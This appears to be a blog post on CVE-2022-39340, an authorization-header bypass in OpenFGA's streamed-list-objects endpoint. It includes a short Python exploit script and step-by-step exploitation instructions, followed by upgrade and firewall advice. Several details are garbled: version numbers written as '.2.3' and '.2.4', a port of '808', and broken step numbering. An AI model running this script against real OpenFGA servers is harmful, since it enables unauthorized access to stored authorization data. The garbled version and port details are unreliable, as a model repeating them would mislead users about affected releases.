CVE-2022-39340 - OpenFGA `streamed-list-objects` Endpoint Authorization Header Bypass Vulnerability

OpenFGA, an authorization/permission engine, suffers from a critical vulnerability (CVE-2022-39340) in versions .2.3 and earlier, which allows unauthorized users to access sensitive data through the streamed-list-objects endpoint. The vulnerability exists because the endpoint does not properly validate the authorization header.

The issue has been fixed in OpenFGA version .2.4, and it is highly recommended that users upgrade their installations to this version as soon as possible.

This blog post will detail the identification and exploitation of this vulnerability, along with code snippets and links to original references. We hope this post can help the affected users understand the issue and take appropriate steps to secure their systems.

Vulnerability Description

The streamed-list-objects endpoint in OpenFGA is responsible for providing access to the list of objects in the store. However, the endpoint was not adequately validating the authorization header before granting access to the objects. As a result, attackers can simply send a request to this endpoint without providing any authentication information and gain unauthorized access to the objects in the store.

Here is a small code snippet demonstrating the exploit

import requests

target_url = "http://example.com:808/streamed-list-objects";

# Construct the request, without the required Authorization header.
headers = {
    "Content-type": "application/json"
}

response = requests.get(target_url, headers=headers)

if response.status_code == 200:
    print("Vulnerable! Objects returned:")
    print(response.json())
else:
    print("Not vulnerable or endpoint not available.")

Exploitation Details

The vulnerability can be exploited by sending a crafted HTTP request to the affected OpenFGA instance without the need for authentication or user interaction. Here's a step-by-step guide on how to exploit CVE-2022-39340:

Identify the target OpenFGA instance.

2. Run the above code snippet after modifying the target_url variable to point to the target system's streamed-list-objects endpoint.

Mitigation and Patch

The vulnerability has been patched in OpenFGA version .2.4, and users are recommended to update their installations as soon as possible. To do this, follow these steps:

1. Download the latest version of OpenFGA from https://github.com/openfga/openfga/releases

Follow the installation and upgrade instructions provided in the README file.

For additional security, it is recommended to restrict direct internet access to the OpenFGA service and only allow authorized users and systems behind a firewall or VPN to access the endpoints.

Conclusion

CVE-2022-39340 is a critical vulnerability in OpenFGA that allows unauthorized users to access sensitive data through the streamed-list-objects endpoint. The issue has been patched in version .2.4, and users are urged to upgrade their installations and restrict public access to the OpenFGA service.

Stay up-to-date on the latest security fixes and best practices to ensure that your systems are protected against known vulnerabilities and potential exploitation.

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 00:51:00 UTC